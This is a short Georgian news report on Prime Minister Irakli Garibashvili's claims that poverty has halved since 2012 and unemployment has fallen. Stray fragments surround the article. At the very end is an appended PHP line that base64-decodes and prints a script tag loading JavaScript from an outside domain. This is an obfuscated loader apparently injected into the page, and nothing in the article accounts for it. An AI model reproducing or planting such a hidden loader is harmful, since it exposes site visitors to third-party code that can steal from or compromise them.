celsiusi
ავერსი საქკაბელი

თითქმის ნახევარ მილიონზე მეტმა ადამიანმა, 2012 წელთან შედარებით, დააღწია თავი სიღარიბეს, 1 100 000 ადამიანი იყო სიღარიბის ზღვარს ქვემოთ 2012 წელს, როცა ჩვენ ჩავიბარეთ ხელისუფლება და განახევრებულია ეს მაჩვენებელი, – ამის შესახებ პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა განაცხადა.

„შედარებისთვის, უმუშევრობის დონე 2010 წელს იყო 27%, ახლა 17%-ზე არის ჩამოსული, 10 წელიწადში ამხელა პროგრესია. სიღარიბის მაჩვენებელი იყო, თუ არ ვცდები, 37-38%-ზე 2010, 2011, 2012 წლებში. აქედან გამომდინარე, ეს ყველაფერი, რასაც ვსაუბრობთ, არ არის მხოლოდ სიტყვები, ეს ყველაფერი არის გამყარებული ფაქტებით“,- აღნიშნა ღარიბაშვილმა.

მისივე თქმით, 15.6%-ს მიაღწია სიღარიბის დონემ, რაც ჯერ კიდევ არის დიდი პრობლემა, მაგრამ ისტორიული მინიმუმია.

„სიღარიბე არის ისტორიულ მინიმუმზე, 15.6%-ს მიაღწია სიღარიბის დონემ, რაც, რა თქმა უნდა, ჯერ კიდევ არის დიდი პრობლემა, მაგრამ ისტორიული მინიმუმია. როგორც უკვე აღნიშნა ბატონმა ლევანმა, ყველამ კარგად ვიცით, თითქმის ნახევარ მილიონზე მეტმა ადამიანმა, 2012 წელთან შედარებით, დააღწია თავი სიღარიბეს, 1 100 000 ადამიანი იყო სიღარიბის ზღვარს ქვემოთ 2012 წელს, როცა ჩვენ ჩავიბარეთ ხელისუფლება და განახევრებულია ეს მაჩვენებელი“, – განაცხადა პრემიერმა.

625
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");